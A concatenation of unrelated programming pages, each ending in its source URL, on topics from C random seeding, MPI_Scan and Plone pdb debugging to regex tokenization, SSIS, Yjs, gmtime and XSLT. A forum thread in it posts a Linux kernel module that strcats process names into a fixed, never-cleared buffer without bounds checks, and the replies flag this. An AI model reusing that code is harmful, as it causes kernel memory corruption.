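    print(key, looks_like_conventional_key(key))
```

Such a check is only a lint, of course - plenty of established keys bend the conventions, so it flags candidates for review rather than rejecting tags outright.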
https://wiki.openstreetmap.org/wiki/Any_tags_you_like
If you've ever used the stdlib.h rand() function, you've probably noticed that every time you run your program, it gives back the same results. This is because, by default, the standard (pseudo) random number generator is seeded with the number 1. To have it start anywhere else in the series, call the function srand(unsigned int seed). For the seed, you can use the current time in seconds.

#include <time.h>

// At the beginning of main, or at least before you use rand()
srand(time(NULL));

Note that this seeds the generator from the current second. This means that if you expect your program to be rerun more than once a second (some kind of batch processor or simulator maybe), this will not be good enough for you. A possible workaround is to store the seed in a file, which you then increment every time the program is run. When you're using random numbers, be very considerate about what you're using them for, and how random they need to be. The standard library rand() function may or may not be good enough for what you're using it for (i.e. gambling, cryptography, etc.).
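The same seed-determines-the-sequence behaviour is easy to demonstrate in any PRNG. Here is a small Python illustration of the idea (Python's random module rather than C's rand(), so the mechanics differ but the principle is identical):

```python
import random
import time

# The same seed always reproduces the same sequence...
random.seed(1)
first_run = [random.randint(0, 99) for _ in range(5)]
random.seed(1)
second_run = [random.randint(0, 99) for _ in range(5)]
print(first_run == second_run)

# ...so seed from the clock when you want different runs to differ,
# just like srand(time(NULL)) in the C snippet above.
random.seed(time.time())
third_run = [random.randint(0, 99) for _ in range(5)]
```

Note that time.time() has sub-second resolution, so Python does not share the once-per-second limitation described above for time(NULL).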
http://ctips.pbworks.com/w/page/7277631/SeedRand
Computes an inclusive scan (partial reduction)

#include <mpi.h>
int MPI_Scan(const void *sendbuf, void *recvbuf, int count, MPI_Datatype datatype, MPI_Op op, MPI_Comm comm)

MPI_Scan is used to perform an inclusive prefix reduction on data distributed across the group. A segmented scan operates on pairs of values and logicals, where the logicals delineate the various segments of the scan. For example,

values    v1   v2      v3   v4      v5          v6   v7      v8
logicals  0    0       1    1       1           0    0       1
result    v1   v1+v2   v3   v3+v4   v3+v4+v5    v6   v6+v7   v8

The result for rank j is thus the sum v(i) + ... + v(j), where i is the lowest rank such that for all ranks n, i <= n <= j, logical(n) = logical(j). The operator that produces this effect is shown in the following fragment (only partially preserved here), which builds the MPI datatype for the value/logical pairs:

MPI_Get_address(a.log, disp + 1);
base = disp[0];
for (i = 0; i < 2; ++i)
    disp[i] -= base;
MPI_Type_struct(2, blocklen, disp, type, &sspair);
MPI_Type_commit(&sspair);
/* scanning */
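To make the segmented-scan table concrete, here is a plain-Python sketch of the same rule - restart the running sum whenever the logical flag changes from the previous rank. This only illustrates the semantics; it is not an MPI program:

```python
def segmented_inclusive_scan(values, logicals):
    """Inclusive prefix sums that restart whenever the logical flag changes."""
    result = []
    running = 0
    for j, (v, flag) in enumerate(zip(values, logicals)):
        if j == 0 or flag != logicals[j - 1]:
            running = v          # new segment: restart the sum
        else:
            running += v         # same segment: keep accumulating
        result.append(running)
    return result

# Reproducing the table above with v1..v8 = 1..8:
print(segmented_inclusive_scan([1, 2, 3, 4, 5, 6, 7, 8],
                               [0, 0, 1, 1, 1, 0, 0, 1]))
```

In real MPI, the restart logic lives inside the user-defined reduction operator applied to the value/logical pairs, since each rank only combines its pair with the partial result from the previous rank.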
https://www.carta.tech/man-pages/man3/MPI_Scan.openmpi.3.html
Results 1 to 3 of 3

I'm a newbie in Linux kernel programming and needed some help. I need to write a Linux kernel module that creates a block device /dev/theprocs that "contains" the process list. ...

- Join Date
- Jun 2014
- 1

Getting killed message when doing cat /dev/myModule

I need to write a Linux kernel module that creates a block device /dev/theprocs that "contains" the process list. So I have written some code which gives me the list of the current processes. The only problem I am running into is displaying the list in stdout (the terminal) instead of the kernel log file. When I cat /dev/theprocs the first time, it gives me the message "Killed". When I remove and install the module again, it works. So it works every alternate time. I need help in solving this issue.

Code:

#include <linux/module.h>
#include <linux/sched.h>
#include <linux/string.h>
#include <linux/fs.h>
#include <asm/uaccess.h>
#include <linux/proc_fs.h>
#include <linux/kernel.h>

MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("Device Driver Demo");
MODULE_AUTHOR("Joey");

static int dev_open(struct inode *, struct file *);
static int dev_rls(struct inode *, struct file *);
static ssize_t dev_read(struct file *, char *, size_t, loff_t *);

int len, temp;
char msg[3000];
int totalLen;

static struct file_operations fops =
{
    .read = dev_read,
    .open = dev_open,
    .release = dev_rls,
};

int init_module(void)
{
    int t = register_chrdev(101, "theprocs", &fops);
    if (t < 0)
        printk(KERN_ALERT "Device failed to register!");
    else
        printk(KERN_ALERT "Registered device...\n");
    return t;
}

static int dev_open(struct inode *inod, struct file *fil)
{
    struct task_struct *task;
    for_each_process(task) {
        printk("%s [%d]\n", task->comm, task->pid);
        strcat(&msg[0], task->comm);
        strcat(&msg[0], "\n");
        totalLen = totalLen + strlen(task->comm);
    }
    strcat(&msg[0], "\0");
    len = strlen(msg);
    temp = len;
    printk("%s [%d]\n", task->comm, totalLen);
    return 0;
}

void cleanup_module(void)
{
    unregister_chrdev(101, "theprocs");
}

static ssize_t dev_read(struct
file *filp, char *buf, size_t count, loff_t *offp)
{
    if (count > temp) {
        count = temp;
    }
    temp = temp - count;
    copy_to_user(buf, msg, count);
    if (count == 0)
        temp = len;
    return count;
    //return 0;
}

static int dev_rls(struct inode *inod, struct file *fil)
{
    printk(KERN_ALERT "Done with device\n");
    return 0;
}

- Join Date
- Dec 2011
- Location
- Turtle Island West
- 413

I'm no kernel guru, but... You say you need to create a *block* device, but aren't you actually creating a *character* device? Also I'm not so sure about that for_each_process(task) bit. It seems a bit grotty, and strcat is dangerous. Use strncat and check the lengths for sanity. You could be getting some unexpected stuff. msg[] only holds 3000 bytes. That's not very big. It's only 37.5 lines of an 80-column display. You never check to see if task is NULL. Dereferencing a NULL pointer goes straight to segfault with no stops on the way.

- Join Date
- Apr 2009
- Location
- I can be found either 40 miles west of Chicago, in Chicago, or in a galaxy far, far away.
- 11,655

Miven is correct. Normally you can't just cat from /dev/blockdevid unless your kernel driver code has some ability to deal with such requests. Without your full driver code, there isn't much we can tell you.

Sometimes, real fast is almost as good as real time. Just remember, Semper Gumbi - always be flexible!
http://www.linuxforums.org/forum/kernel/201929-getting-killed-message-when-doing-cat-dev-mymodule.html
Python Debugging¶

Description: Using the Python command-line debugger (Pdb) to debug Plone and Python applications.

Introduction¶

The Python Debugger (Pdb) is an interactive command-line debugger. Plone also has through-the-web-browser Pdb debugging add-on products.

Note: Pdb is not the same as the Python interactive shell. Pdb allows you to step through the code, whilst the Python shell allows you to inspect and manipulate objects. If you wish to play around with Zope in an interactive Python shell or run scripts instead of debugging (exceptions), please read the Command line documentation.

Usage¶

1. Go to your code and insert the statement import pdb; pdb.set_trace() at the point where you want to have a closer look. Next time the code is run, the execution will stop there and you can examine the current context variables from a Python command prompt.

2. After you have added import pdb; pdb.set_trace() to your code, stop Zope and start it in the foreground using the bin/instance fg command.

Example:

class AREditForm(crud.EditForm):
    """ Present edit table containing rows per each item added and delete controls """

    editsubform_factory = AREditSubForm
    template = viewpagetemplatefile.ViewPageTemplateFile('ar-crud-table.pt')

    @property
    def fields(self):
        #
        # Execution will stop here and an interactive Python prompt is opened
        #
        import pdb ; pdb.set_trace()
        constructor = ARFormConstructor(self.context, self.context.context, self.request)
        return constructor.getFields()

Printing Objects¶

Example:

>>> from pprint import pprint as pp
>>> pp folder.__dict__
{
 '_Access_contents_information_Permission': ['Anonymous', 'Manager', 'Reviewer'],
 '_List_folder_contents_Permission': ('Manager', 'Owner', 'Member'),
 '_Modify_portal_content_Permission': ('Manager', 'Owner'),
 '_View_Permission': ['Anonymous', 'Manager', 'Reviewer'],
 '__ac_local_roles__': {'gregweb': ['Owner']},
 '_objects': ({'meta_type': 'Document', 'id': 'doc1'}, {'meta_type': 'Document', 'id': 'doc2'}),
 'contributors': (),
 'creation_date': DateTime('2005/02/14 20:03:37.171 GMT+1'),
 'description': 'Dies ist der Mitglieder-Ordner.',
 'doc1': <Document at doc1>,
 'doc2': <Document at doc2>,
 'effective_date': None,
 'expiration_date': None,
 'format': 'text/html',
 'id': 'folder',
 'language': '',
 'modification_date': DateTime('2005/02/14 20:03:37.203 GMT+1'),
 'portal_type': 'Folder',
 'rights': '',
 'subject': (),
 'title': "Documents",
 'workflow_history': {'folder_workflow': ({'action': None, 'review_state': 'visible', 'comments': '', 'actor': 'gregweb', 'time': DateTime('2005/02/14 20:03:37.187 GMT+1')},)}
}

Commands¶

Type the command and hit enter.

``s`` step into: go into the function under the cursor
``n`` step over: execute the function under the cursor without stepping into it
``c`` continue: resume the program
``w`` where am I? displays the current location in the stack trace
``b`` set a breakpoint
``cl`` clear a breakpoint
``bt`` print the stack trace
``up`` go to the scope of the caller function
``pp`` pretty-print an object
``until`` continue execution until a line with a number greater than the current one is reached, or until returning from the current frame

Snippets¶

Output an object's class:

(Pdb) print obj.__class__

Output an object's attributes and methods:

(Pdb) for i in dir(obj): print i

Print local variables in the current function:

(Pdb) print locals()

Dumping an incoming HTTP GET or HTTP POST:

(Pdb) print "Got request:"
(Pdb) for i in self.request.form.items(): print i

Executing code in the context of the current stack frame:

(Pdb) from pprint import pprint as pp
(Pdb) pp my_tags
['bar', 'barbar']
(Pdb) !my_tags = ['foo', 'foobar']
(Pdb) pp my_tags
['foo', 'foobar']

Note: The example above will modify the previous value of the variable my_tags in the current stack frame.
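Pdb can also be driven non-interactively, which is a handy way to see what the commands above do without a live terminal. A small sketch - the function and the canned command script are invented for illustration:

```python
import io
import pdb

def compute():
    x = 41
    return x + 1

# Feed pdb a scripted session instead of typing at the (Pdb) prompt:
# "n" steps over the first line, "p x" prints x, "c" continues to the end.
commands = io.StringIO("n\np x\nc\n")
output = io.StringIO()
debugger = pdb.Pdb(stdin=commands, stdout=output)
result = debugger.runcall(compute)

print(result)  # the function still returns normally
```

The captured output contains the same prompts and printed values an interactive session would show, so this trick is also useful for testing debugging helpers.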
Instead of getting the "We're sorry, there seems to be an error..." page, you get a Pdb prompt which allows you to debug the exception. This is also known as post-mortem debugging. This can be achieved with the `Products.PDBDebugMode` add-on. By using this add-on, you have a /@@pdb view that you can call on any context too.

Note: Remember that this add-on hooks into the "error_log" exception handling. If you don't want to enter Pdb when a specific exception is raised, like Unauthorized, you should edit it in the ZMI. PDBDebugMode is not safe to install on a production server due to a sandbox security escape.

Command Line¶

Note: This cannot be directly applied to a web server, but works with command-line scripts. This does not work with a Zope web server launch, as it forks a process.

Example:

python -m pdb myscript.py

Hit c and enter to start the application. It keeps running until an uncaught exception is raised. At this point, it falls back to the Pdb debug prompt. For more information see

Interactive Debugging¶

You can use interactive debugging via bin/{client1|instance} debug (use the name of the instance script you're using in your buildout). It gives you an interactive Python interpreter with access to Zope's root object (bound to "app"). In the interpreter, you can do "normal" Python debugging.

Alternative Debugger¶

Some of these options (like q) are complementary to Pdb itself. We suggest you try the alternatives here; some features (like tab completion and syntax highlighting) are hard to live without after getting used to them.

ipdb¶

ipdb exports functions to access the IPython debugger, which features tab completion, syntax highlighting, better tracebacks, and better introspection with the same interface as the Pdb module. If you install iw.debug with ipdb, you can call ipdb on any object of your instance by adding /ipdb to any URL.

pdbpp¶

This module is an extension of the Pdb module of the standard library.
It is meant to be fully compatible with its predecessor, yet it introduces a number of new features to make your debugging experience as nice as possible. pdb++ is meant to be a drop-in replacement for Pdb.

debug¶

Instead of import pdb;pdb.set_trace() you can use import debug; it then automatically enters ipdb. You can do /bin/instance debug and then call import debug as well.

pudb¶

It's an alternative to Pdb with a curses interface. Use search to find relevant source code, or use "m" to invoke the module browser that shows loaded modules, lets you load new ones and reload existing ones. Breakpoints can be set.

q¶

Quick and dirty debugging output. All output goes to /tmp/q, which you can watch with this shell command: tail -f /tmp/q. That way you can print variables, functions, etc. Check its documentation for more examples.

Debugging Page Templates¶

Since Plone 5, Chameleon (five.pt) is used for the TAL engine. When using Chameleon, we can use the following snippet to debug page templates:

Example:

<?python locals().update(econtext); import pdb; pdb.set_trace() ?>

However, this doesn't work in skin templates and in TTW (Through-The-Web) templates. If you want a full explanation of how this snippet works (especially about the context variable), check.

Debugging ZMI Python Script¶

If you install in your instance, you can import Pdb inside a Python Script.

Browser Extensions¶

If you need to call /@@reload (if you installed plone.reload) or ?diazo on your current Plone, you can use the Plone Reloader extension. This extension displays the plone.reload form in a popup so you can reload your current Plone instance code without switching to another tab. It also provides buttons to open diazo off/debug URLs.
https://docs.plone.org/develop/debugging/pdb.html
Technically this problem is not really one of tokenization but rather just classifying the input with a common name, but the technique can be fairly easily extended. In PHP the solution is courtesy of the third argument to preg_match(); for example:

$inputs = array( 'Kanton Zuerich', 'Frauenfeld Regione', 'Fricktal Gruppe');
foreach ( $inputs as $input ) {
    preg_match("/(cantone?|kanton)|(regione?)|(groupe?|grupp(?:o|e))/i", $input, $matches);
    print_r($matches);
}

I get output like;

Array ( [0] => Kanton [1] => Kanton )
Array ( [0] => Regione [1] => [2] => Regione )
Array ( [0] => Gruppe [1] => [2] => [3] => Gruppe )

Notice how the first element of this array is always what I matched, while elements indexed 1+ correspond to the position of the subpattern I matched against, from left to right in the pattern - this I can use to tell me what I actually matched, e.g.;

$inputs = array( 'Kanton Zuerich', 'Frauenfeld Regione', 'Fricktal Gruppe');
$tokens = array('canton','region','group'); // the token names

foreach ( $inputs as $input ) {
    if ( preg_match("/(cantone?|kanton)|(regione?)|(groupe?|grupp(?:o|e))/i", $input, $matches) ) {
        foreach ( array_keys( $matches) as $key) {
            if ( $key == 0 ) { continue; } // skip the first element
            // Look for the subpattern we matched...
            if ( $matches[$key] != "" ) {
                printf("Input: '%s', Token: '%s'\n", $input, $tokens[$key-1]);
            }
        }
    }
}

Which gives me output like;

Input: 'Kanton Zuerich', Token: 'canton'
Input: 'Frauenfeld Regione', Token: 'region'
Input: 'Fricktal Gruppe', Token: 'group'

…so I'm now able to classify the input to one of a set of known tokens and react accordingly. Most regex
APIs provide something along these lines; for example, here's the same (and much cleaner) in Python, which is what I actually used on this problem:

import re

p = re.compile('(cantone?|kanton)|(regione?)|(groupe?|grupp(?:o|e))', re.I)

inputs = ('Kanton Zuerich', 'Frauenfeld Regione', 'Fricktal Gruppe')
tokens = ('canton','region','group')

for input in inputs:
    m = p.search(input)
    if not m:
        continue
    for group, token in zip(m.groups(), tokens):
        if group is not None:
            print "Input: '%s', Token: '%s'" % ( input, token )

Could be reduced further using list comprehensions, but I don't think it helps readability in this case.

An alternative problem, to give you a feel for how this technique can be applied: let's say you want to parse an HTML document and list a subset of the block-level vs. the inline-level tags it contains. You might do this with two sub-patterns, e.g.

(</?(?:div|h[1-6]{1}|p|ol|ul|pre).*?>)|(</?(?:span|code|em|strong|a).*?>)

(note this regex as-is is geared to Python's idea of greediness - you'd need to change it for PHP), leading to something like this in Python:

p = re.compile('(</?(?:div|h[1-6]{1}|p|ol|ul|pre).*?>)|(</?(?:span|code|em|strong|a).*?>)')
for match in p.finditer('foo <div> test <strong>bar</strong> test 1</div> bar'):
    print "[pos: %s] matched %s" % ( match.start(), str(match.groups()) )

The call to match.groups() returns a tuple which tells you which sub-pattern matched, while match.start() tells you the character position in the document where the match was made, allowing you to pull substrings out of the document.

January 19th, 2008 at 3:23 am
Another good way to tokenize is with preg_split() and the PREG_SPLIT_DELIM_CAPTURE option. See my Regex Clinic slides on

January 19th, 2008 at 5:07 am
Thanks to guys like you Andrei PHP is on the top. Thanks man!

January 19th, 2008 at 6:35 am
PHP_LexerGenerator takes this principle and combines it with the idea of states to implement a re2c-like lexer generator grammar for PHP.
January 19th, 2008 at 9:21 am
Interesting fact (well, I think so at least): the Django template engine uses a single regular expression to tokenize the entire template. That's the main reason it's so fast compared to many of the other Python template languages out there. Take a look at this: (in particular line 90, where tag_re is declared).

January 20th, 2008 at 12:55 pm
A single, long regular expression can often be more inefficient than small regular expressions due to backtracking.

January 20th, 2008 at 7:35 pm
Interesting point, although that might well be outweighed by having to make additional calls in PHP or Python, depending on what you're doing.
http://www.sitepoint.com/blogs/2008/01/19/tokenization-using-regular-expression-sub-patterns/
#include <nrt/Core/Design/Watchdog.H> Launch a function after some amount of time has passed during which no reset was received. A countdown over a given delay passed at construction is initiated, and the function passed at construction will be called, unless the countdown is reset by calling the reset() function. A call to reset() simply sets back the clock to the full delay, and the countdown starts again from there (i.e., it does not stop the clock). This class is thread-safe, i.e., multiple threads can call reset() concurrently without having to worry about locking. If the countdown ever reaches 0, the function will be called in a separate thread. Definition at line 57 of file Watchdog.H. Constructor, setting the time delay and function that will be launched should the delay expire. If counting down, wait until we timeout, otherwise (dormant state) return immediately. This function is guaranteed to not block forever (stuck in dormant state) as it will return immediately if dormant, otherwise it will wait until the next timeout and return. It can be used if you need to wait until a timeout gets triggered, but you do not want to wait forever in case we are dormant.
http://nrtkit.net/documentation/classnrt_1_1Watchdog.html
This post is inspired by a question asked in my blog this morning, about handling file-not-found errors from an SSIS package. A typical use case is as follows. An SSIS package is scheduled to run every X minutes and processes files coming into a folder. However, a file may not be present every time the package runs. If a file is available, it should be processed. If the file is not found, the package should exit gracefully, without generating an error.

There are different ways of handling this. This post demonstrates one of them: handling the file-not-found case using a script task.

Checking the existence of the file using a script task

To start with, let us create two variables: one for the file name, and another a boolean flag that indicates whether the file exists or not. The script task will set this variable to true or false depending upon the existence of the file. Execution will continue to the next step only if the file exists.

Next, let us add a script task and a data flow task into the package designer. Now, let us add a precedence constraint that ensures that the data flow task is executed only if the value of the variable Exists is set to true. Keep in mind that we will change the value of this variable from the script task depending upon the presence or absence of the file.

Let us now proceed with writing the script. Before we actually move into the script designer, open the properties of the script task and set the read-only and read-write variables. Next, click on the Edit Script button, which will open the script editor. To start with, we will need the following using statement:

using System.IO;

Next, add the following code into the Main() function.
string file = Dts.Variables["User::FileName"].Value.ToString();

if (File.Exists(file))
{
    Dts.Variables["User::Exists"].Value = true;
}
else
{
    Dts.Variables["User::Exists"].Value = false;
}

Dts.TaskResult = (int)ScriptResults.Success;

Well, we are now ready for testing. Run the package both in the presence and in the absence of the input file and ensure that it works in both cases.
http://beyondrelational.com/modules/2/blogs/28/Posts/15790/ssis-handling-package-failures-when-the-input-file-is-not-found.aspx
Thanks to @NathanaelA's pledge on Patreon we just received a wonderful addition: :sparkles: Monaco support (the editor that powers VS Code) :sparkles: Live Demo: Demo Code: Binding repository:

@calibr Yes, I broke encoding. These are my final fixes to create a stable API to Yjs.

Thanks for your feedback @canadaduane :) You can absolutely do that in both v13 and v12. Shared types are just data types, and of course you can nest them. But it may take some time to get used to the concept of shared data types. You should just start and observe the changes as you are doing them. Here is a template to create a file system using Y.Map as the directory and Y.Text as files. This will work in Yjs version 13 (in beta):

const yMap = doc.getMap('my-directory')
const file = new Y.Text()
yMap.set('index.js', file)
new TextareaBinding(file, document.querySelector('textarea'))
yMap.set('index.js', file)

import React, {Component} from 'react';
import * as Y from 'yjs'
import { WebsocketProvider } from 'y-websocket'

const doc = Y.Doc()
const provider = new WebsocketProvider('', 'roomname')
provider.sync('doc')
const ytext = doc.getText('my resume')

class App extends Component {
  render() {
    return (<div>test</div>);
  }
}

export default App;

Thanks @crazypenguinguy I made some mistakes in the documentation. For example, the url must be a ws:// or wss:// url. I corrected it. Let me know if something else is unclear. Here is the fixed code for your demo:

import React, { Component } from "react";
import ReactDOM from "react-dom";
import * as Y from "yjs";
import { WebsocketProvider } from "y-websocket";

const doc = new Y.Doc();
const provider = new WebsocketProvider("ws://localhost:1234", "roomname", doc);
const ytext = doc.getText("my resume");

class App extends Component {
  render() {
    return <div>test</div>;
  }
}

export default App;

const rootElement = document.getElementById("root");
ReactDOM.render(<App />, rootElement);

Good questions.
Comparing Yjs and Automerge:

• Both projects provide easy access to manipulating the shared data. Automerge's design philosophy is that state is immutable. In Yjs, state is mutable and observable.
• Automerge has more demo apps where state is shared to build some kind of application. But in theory, you could implement shared text editing with Automerge.
• Yjs is more focused on shared editing (on text, rich text, and structured content). It has lots of demos for different editors (Quill, ProseMirror, Ace, CodeMirror, Monaco, ...).
• I spent a lot of time optimizing Yjs to work on large documents. While Automerge works fine on small documents, it has serious performance problems as the document grows in size.
• Yes, Automerge has support for hypermerge/DAT. I am also looking into it, as it seems like a really cool idea. I'm currently exploring multifeed for that. On the other hand, Yjs has support for IPFS.

Yjs & Electron: No problem here in general. You'll need to polyfill WebSocket / WebRTC support in Electron. There is ws for WebSocket support and node-webrtc for WebRTC.

Query Index: There is nothing like that to my knowledge. But maybe you could have a look at GUN.

@calibr I have no experience with document indexing. Thanks for sharing your experience.

@canadaduane Thanks for your appreciation :) I was referring to the frontend of the shared editing framework. Yjs exposes mutable types (e.g. Y.Array). Automerge exposes immutable json-like objects. In Yjs, the operation log is not immutable, i.e. it may decrease in size when you delete content. I describe some optimizations I do in the v13 log, but let me know if you want to know more.

About P2P Electron apps: DAT is a very ambitious project that wants to share many large files in a distributed network. Compared to WebRTC, UDP connections are initialized much faster and are better suited for their use-case (e.g. walking through peers of the DHT).
However, if you only want to share a single document, WebRTC will work just fine and is also supported in the browser.

@/all The Quill editor binding was just added for v13, including shared cursors and many additional consistency tests. Demo: y-quill (userOnly: true, see).
https://gitter.im/y-js/yjs?at=5cf5313582c2dc79a543c6ce
convert calendar time to a broken-down time

Synopsis:

#include <time.h>

struct tm *gmtime( const time_t *timer );
struct tm *_gmtime( const time_t *timer, struct tm *tmbuf );

Description:

The gmtime() functions convert the calendar time pointed to by timer into a broken-down time, expressed as Coordinated Universal Time (UTC) (formerly known as Greenwich Mean Time (GMT)). The _gmtime() function places the converted time in the tm structure pointed to by tmbuf, and the gmtime() function places the converted time in a static structure that is re-used each time gmtime() is called.

The time set on the computer with the QNX date command reflects Coordinated Universal Time (UTC). The environment variable TZ is used to establish the local time zone. See the Global Data and the TZ Environment Variable chapter for a discussion of how to set the time zone.

Returns:

A pointer to a structure containing the broken-down time.

Example:

#include <stdio.h>
#include <time.h>

int main( void )
{
    time_t time_of_day;
    char buf[26];
    struct tm tmbuf;

    time_of_day = time( NULL );
    _gmtime( &time_of_day, &tmbuf );
    printf( "It is now: %.24s GMT\n", _asctime( &tmbuf, buf ) );
    return 0;
}

produces the output:

It is now: Fri Dec 25 15:58:27 1987 GMT

See also:

asctime(), clock(), ctime(), difftime(), localtime(), mktime(), strftime(), time(), tzset()

The tm structure is described in the section on <time.h> in the Header Files chapter.
https://users.pja.edu.pl/~jms/qnx/help/watcom/clibref/src/gmtime.html
Subject: Re: [boost] [SORT] Parallel Algorithms
From: Francisco José Tapia (fjtapia_at_[hidden])
Date: 2014-12-23 18:00:01

Hi Steven,

Thanks for your ideas. I will check them. Right now I am designing, developing and testing several improvements for the algorithms. When I finish, I will prepare a clear and easy interface to transform any sort algorithm, even the parallel ones, into an indirect sort, and prepare a brief document explaining how to do it. Perhaps that will be a good moment to move all the code to the namespace boost::sort.

Only after these things will I begin to prepare the big benchmark. And then I would like your experience and opinion. My idea is to make the benchmark run in an easy way; if we want to know the opinion and results of other members of the Boost community, we must try to simplify their work.

I will inform you of my progress, but I must travel to be with my family, and until January I won't be running at full speed.

Happy Christmas. My best wishes for you and the Boost community.

Francisco

2014-12-23 12:49 GMT+01:00 Steven Ross <spreadsort_at_[hidden]>:

> Francisco,
>
> On Tue Dec 23 2014 at 3:31:32 AM Francisco José Tapia <fjtapia_at_[hidden]>
> wrote:
>
> > We can also do a benchmark with variable-length elements, with strings.
> >
> > If you prepare the operations to do in that test, I can prepare an
> > additional benchmark with all the algorithms and your operations.
> >
> > After all, we see and take a decision
> >
> > Yours
> >
> > Francisco
>
> The approach I've used with the boost::sort library is to set up the
> benchmark tests so that they read in a file of random data generated by a
> single application (randomgen), or any other file that is passed in for
> testing, and they write out their results to file. This enables better
> testing and debugging in case there are any problems (I directly diff the
> sort results when I can expect them to be identical; tune.pl does this
> automatically).
> I would prefer if you used stringsample.cpp and int64.cpp as examples of
> how to do this, and downloaded the boost sort library and added any
> modifications you need into that code. The library has a tune.pl script
> that runs the benchmarks. It may be helpful to write some utility
> templated function to switch between different algorithms, instead of the
> current approach of using a "-std" switch to use std::sort.
>
> There is a README there on how to install it using modular boost.
>
> _______________________________________________
> Unsubscribe & other changes:

Boost list run by bdawes at acm.org, gregod at cs.rpi.edu, cpdaniel at pacbell.net, john at johnmaddock.co.uk
https://lists.boost.org/Archives/boost/2014/12/218438.php
PyMaemo/Python-GPSbt

Introduction

Python-GPSbt is a binding, based on libgpsbt, that provides access to GPS data through osso-gpsd. It only depends on a Bluetooth GPS device already being paired.

How it works

Libgpsbt allows connecting with Bluetooth GPS devices and uses the osso-gpsd daemon to provide a socket where you can send/receive information. After a gpsbt.start() it is possible to send commands (through query) and receive data from the GPS. Almost all information acquired from the socket is stored inside a structure called 'fix'. To fill it, just call get_fix(), which does a query to get all necessary information from the GPS device. To finish the Bluetooth connection, just call the gpsbt.stop() method, providing the context (returned by gpsbt.start()).

API

gpsbt.start - establishes a new GPS connection and returns a context. The context is used to inform the stop method which connection is to be ended.

    context = gpsbt.start()

gpsbt.stop - ends an active connection, passed through the context.

    gpsbt.stop(context)

gpsbt.gps() - the class that gets information from the GPS. Through it, it is possible to query, get_fix, get_position, etc.

gpsbt.gps.get_fix() - fills in the 'fix' structure with GPS data. The fields are: mode, time, ept, latitude, longitude, eph, altitude (meters), epv, track (degrees from true north), speed (knots), climb (meters per second), epd, eps and epc.

gpsbt.gps.get_position() - a shortcut that returns (latitude, longitude) info.

gpsbt.gps.query() - allows the user to send one-letter commands to the GPS device. It is possible to group a sequence of commands to send, e.g.:

    gpsbt.gps.query('a') fills in the altitude field of the 'fix' structure
    gpsbt.gps.query('as') fills in the altitude and speed fields

gpsbt.gps.satellites - contains a list of detected satellites, including information about usage and quality.
Example

The code below shows how to connect with a GPS device, get data and close the connection:

import gpsbt
import time

def main():
    context = gpsbt.start()
    if context == None:
        print 'Problem while connecting!'
        return

    # ensure that GPS device is ready to connect and to receive commands
    time.sleep(2)

    gpsdevice = gpsbt.gps()

    # read 4 times and show information
    for a in range(4):
        gpsdevice.get_fix()
        time.sleep(2)

        # print information stored under 'fix' variable
        print 'Altitude: %.3f' % gpsdevice.fix.altitude

        # dump all information available
        print gpsdevice

    # ends Bluetooth connection
    gpsbt.stop(context)

main()

Download the source code here.

This page was last modified on 22 June 2010, at 11:51.
http://wiki.maemo.org/PyMaemo/Python-GPSbt
XSL Transformations

In this chapter, I’m going to start working with the Extensible Styles Language (XSL). XSL has two parts—a transformation language and a formatting language. The transformation language lets you transform documents into different forms, while the formatting language actually formats and styles documents in various ways. These two parts of XSL can function quite independently, and you can think of XSL as two languages, not one. In practice, you often transform a document before formatting it because the transformation process lets you add the tags the formatting process requires. In fact, that is one of the main reasons that W3C supports XSLT as the first stage in the formatting process, as we’ll see in the next chapter. This chapter covers the transformation language, and the next details the formatting language.

The XSL transformation language is often called XSLT, and it has been a W3C recommendation since November 11, 1999. You can find the W3C recommendation for XSLT at. XSLT is a relatively new specification, and it’s still developing in many ways. There are some XSLT processors of the kind we’ll use in this chapter, but bear in mind that the support offered by publicly available software is not very strong as yet. A few packages support XSLT fully, and we’ll see them here. However, no browser supports XSLT fully yet. I’ll start this chapter with an example to show how XSLT works.

Using XSLT Style Sheets in XML Documents

You use XSLT to manipulate documents, changing and working with their markup as you want. One of the most common transformations is from XML documents to HTML documents, and that’s the kind of transformation we’ll see in the examples in this chapter. To create an XSLT transformation, you need two documents—the document to transform, and the style sheet that specifies the transformation. Both documents are well-formed XML documents.
Here’s an example; this document, planets.xml, is a well-formed XML document that holds data about three planets—Mercury, Venus, and Earth. Throughout this chapter, I’ll transform this document to HTML in various ways. For programs that can understand it, you can use the <?xml-stylesheet?> processing instruction to indicate what XSLT style sheet to use, where you set the type attribute to "text/xml" and the href attribute to the URI of the XSLT style sheet, such as planets.xsl in this example (XSLT style sheets usually have the extension .xsl):

<?xml version="1.0"?>
<?xml-stylesheet type="text/xml" href="planets.xsl"?>

XSL Style Sheets

Here’s what the style sheet planets.xsl might look like. In this case, I’m converting planets.xml into HTML, stripping out the names of the planets, and surrounding those names with HTML <P> elements:

<?xml version="1.0"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">

<xsl:template match="/PLANETS">
    <HTML>
        <xsl:apply-templates/>
    </HTML>
</xsl:template>

<xsl:template match="PLANET">
    <P>
        <xsl:value-of select="NAME"/>
    </P>
</xsl:template>

</xsl:stylesheet>

All right, we have an XML document and the style sheet we’ll use to transform it. So, how exactly do you transform the document?

Making a Transformation Happen

You can transform documents in three ways:

In the server. A server program, such as a Java servlet, can use a style sheet to transform a document automatically and serve it to the client. One such example is the XML Enabler, which is a servlet that you’ll find at the XML for Java Web site.

In the client. A client program, such as a browser, can perform the transformation, reading in the style sheet that you specify with the <?xml-stylesheet?> processing instruction. Internet Explorer can handle transformations this way to some extent.

With a separate program. Several standalone programs, usually based on Java, will perform XSLT transformations. I’ll use these programs primarily in this chapter.
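The planets.xml document itself is not reproduced in this excerpt. For reference, a minimal sketch consistent with the templates and output shown in this chapter might look like the following (the element names are assumptions drawn from the style sheet):

```xml
<?xml version="1.0"?>
<?xml-stylesheet type="text/xml" href="planets.xsl"?>
<PLANETS>
    <PLANET>
        <NAME>Mercury</NAME>
    </PLANET>
    <PLANET>
        <NAME>Venus</NAME>
    </PLANET>
    <PLANET>
        <NAME>Earth</NAME>
    </PLANET>
</PLANETS>
```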
In this chapter, I’ll use standalone programs to perform transformations because those programs offer by far the most complete implementations of XSLT. I’ll also take a look at using XSLT in Internet Explorer. Two popular programs will perform XSLT transformations: XT and XML for Java.

James Clark’s XT

